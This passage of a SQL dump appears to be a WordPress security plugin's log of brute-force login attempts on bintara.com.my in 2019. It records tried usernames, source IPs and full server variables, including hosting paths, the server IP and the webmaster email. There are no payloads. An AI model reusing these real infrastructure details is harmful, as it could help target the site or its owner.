empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.34.170\";s:11:\"REMOTE_PORT\";s:5:\"36876\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOB0rLuw7edOKpgf7B3xQAAAIQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566802386.1993\";s:12:\"REQUEST_TIME\";s:10:\"1566802386\";}}','notice','2019-08-26 06:53:07','2019-08-26 06:53:06',17679424,19170432,'https://bintara.com.my/wp-login.php',1,0,'159.89.34.170'),(23082,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"195.154.29.107\";s:11:\"REMOTE_PORT\";s:5:\"54280\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOC2XxaD7qVX4VJuZ-jsQAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566802649.6887\";s:12:\"REQUEST_TIME\";s:10:\"1566802649\";}}','notice','2019-08-26 06:57:31','2019-08-26 06:57:30',17681824,19171944,'https://bintara.com.my/wp-login.php',1,0,'195.154.29.107'),(23083,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"195.154.29.107\";s:11:\"REMOTE_PORT\";s:5:\"54878\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOC3HxaD7qVX4VJuZ-jtQAAABE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566802652.9134\";s:12:\"REQUEST_TIME\";s:10:\"1566802652\";}}','notice','2019-08-26 06:57:34','2019-08-26 06:57:33',18201848,19500472,'https://bintara.com.my/xmlrpc.php',1,0,'195.154.29.107'),(23084,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"209.97.181.71\";s:11:\"REMOTE_PORT\";s:5:\"33529\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOESXxaD7qVX4VJuZ-mJgAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566803017.181\";s:12:\"REQUEST_TIME\";s:10:\"1566803017\";}}','notice','2019-08-26 07:03:38','2019-08-26 07:03:37',17684704,19176128,'https://bintara.com.my/wp-login.php',1,0,'209.97.181.71'),(23085,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"209.97.181.71\";s:11:\"REMOTE_PORT\";s:5:\"33804\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOEUHxaD7qVX4VJuZ-mLgAAABE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566803024.8595\";s:12:\"REQUEST_TIME\";s:10:\"1566803024\";}}','notice','2019-08-26 07:03:46','2019-08-26 07:03:45',18201872,19497992,'https://bintara.com.my/xmlrpc.php',1,0,'209.97.181.71'),(23086,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"482\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.126.75\";s:11:\"REMOTE_PORT\";s:5:\"59218\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOE5HxaD7qVX4VJuZ-m3QAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566803172.6046\";s:12:\"REQUEST_TIME\";s:10:\"1566803172\";}}','notice','2019-08-26 07:06:15','2019-08-26 07:06:13',18314176,19500776,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.126.75'),(23087,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.236.140.149\";s:11:\"REMOTE_PORT\";s:5:\"55133\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOHsHxaD7qVX4VJuZ-qCAAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566803888.7202\";s:12:\"REQUEST_TIME\";s:10:\"1566803888\";}}','notice','2019-08-26 07:18:10','2019-08-26 07:18:09',17684880,19174616,'https://bintara.com.my/wp-login.php',1,0,'104.236.140.149'),(23088,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"35.240.189.61\";s:11:\"REMOTE_PORT\";s:5:\"60588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOLlLLuw7edOKpgf7B61wAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566804884.9266\";s:12:\"REQUEST_TIME\";s:10:\"1566804884\";}}','notice','2019-08-26 07:34:46','2019-08-26 07:34:45',17685216,19176456,'https://bintara.com.my/wp-login.php',1,0,'35.240.189.61'),(23553,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.95.13.216\";s:11:\"REMOTE_PORT\";s:5:\"40376\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzAkz42Bg6xBpmAmGwFiwAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567408276.0728\";s:12:\"REQUEST_TIME\";s:10:\"1567408276\";}}','notice','2019-09-02 07:11:17','2019-09-02 07:11:16',17685408,19177288,'https://bintara.com.my/wp-login.php',1,0,'103.95.13.216'),(23552,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 